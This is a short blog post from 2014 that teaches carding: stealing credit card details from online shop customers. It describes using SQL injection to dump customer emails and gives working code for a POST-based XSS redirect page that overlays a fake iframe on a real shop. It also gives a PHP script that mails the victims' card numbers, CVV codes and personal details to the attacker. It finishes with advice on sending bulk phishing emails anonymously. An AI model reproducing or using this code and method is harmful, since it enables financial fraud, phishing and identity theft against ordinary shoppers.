Thursday, August 28, 2014

Hacking CVV Simple

This is my method for getting fresh CC info, sent directly to an inbox of your choosing!


First, you need to find yourself a vulnerable shop. Won't go into too many details here, this should be pretty drilled into your head by now. You can do this with Google Dorks manually, or use tools like WebCruiser, SQLi poison, etc. What your looking for is a shop with both SQLi vulnerabilities, and XSS vulnerabilities.


First, as you may have noticed on most databases containing CC info, it's encrypted, MD5, FPE, whatever it is it's not feasible to work with that. However, one thing you can work with is the current and former customer's e-mail addresses. Go ahead and rip the whole table with the customer information. If you're lucky, you'll get at least 10,000 e-mail addresses or more.


Next, you need to work with the XSS vulnerability. I've noticed the most common being POST vulnerability, so I'll go that route, but you can incorporate it with FORM or whatever.


You can use the following code to make a redirect.html or whatever you wish to name it. This page will load the vulnerable website immediately, with one exception, a giant IFRAME over it which of course is going to be another page you make.

<html>
<head>
<script language=javascript>
function submitPostLink()
:zin:{
document.postlink.submit();
}
</script>
</head>
<body onload="submitPostLink()">
<form action="http://www.XXXXXXXcom/TextSearch.asp" name=postlink method="post">
<input type="hidden" name="NAMEOFVULNERABLEFIELD" value="<iframe  src=&quot;Ecommerce Web Site Hosting and Streaming from YourHost.com  width=&quot;800&quot;height=&quot;2400&quot;  style=&quot;z-index: 0; position: absolute; top: 0; left: 0;  overflow-y: hidden;&quot; frameborder=0  align=center></iframe>">
</form>
</body>
</html>

Go ahead and goto the checkout page for the site you're working with, and save the page to your hard drive, including all the subdirectory files and images (firefox does this auto). Now, you need to edit the main file you just saved.


Search for "action=", and change the page following it to your third page you will make, which will be the PHP mail form that will send your e-mail all the information someone fills in the form. The code will look something like....

<?php
$userinfo = "@com"; //your email here
$ip = getenv("REMOTE_ADDR");
$message .= "".$_POST['firstname']."\n";
$message .= "".$_POST['lastname']."\n";
$message .= "".$_POST['org_name']."\n";
$message .= "".$_POST['telephone']."\n";
$message .= "".$_POST['fax']."\n";
$message .= "".$_POST['email']."\n";
$message .= "---------------------------------------------\n";
$message .= "".$_POST['cctype']."\n";
$message .= "".$_POST['credcard']."\n";
$message .= "".$_POST['exp_mon']."\n";
$message .= "".$_POST['exp_year']."\n";
$message .= "".$_POST['cccvv']."\n";
$message .= "".$_POST['ccname']."\n";

$subject="SUBJECT - $ip";
$headers = "From: NAMEl<@.com>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail($userinfo,$subject,$message,$headers);

You'll want to follow this code with some html code that also looks like a copy of their site but with some text saying something along the lines of "sorry, this offer is no longer available" or something of the sort. I'll explain why right now.


After putting all this together and uploading it to a host, you'll want to shorten youre redirect.html URL, you can use *******, or another shortening service. Then, you can send an e-mail to all the customers e-mail addresses, (AND YOU CAN BE CREATIVE), but something along the lines of them being a valuable customer, and because of that, you're giving them one of your newest products for only 99 cents! Make sure that on your checkout form, you list the item you choose, so they see it when they're checking out.


A great service to send bulk mail for FREE, and no trial or anything, that is if you don't have hacked SMTP to use, is targethero.com


They let you send Unlimited e-mails to up to 5,000 different contacts. Not bad for free. You'll have to confirm your account with a cell phone, but you should just use receive-sms-online.com or freesmsreceive.com/index.php where you can get SMS sent to you with no registration.


Trust me, if you send enough e-mails to former customers, especially when it's in the health and supplement niche, if they get an offer for a 99 cent bottle or something, they're gonna jump all over that!


Anyway, if you have any questions, please feel free to ask, and I apologize if I was a little vague but I don't have much time right now but wanted to get this up. Enjoy!!!

0 Comments:

Post a Comment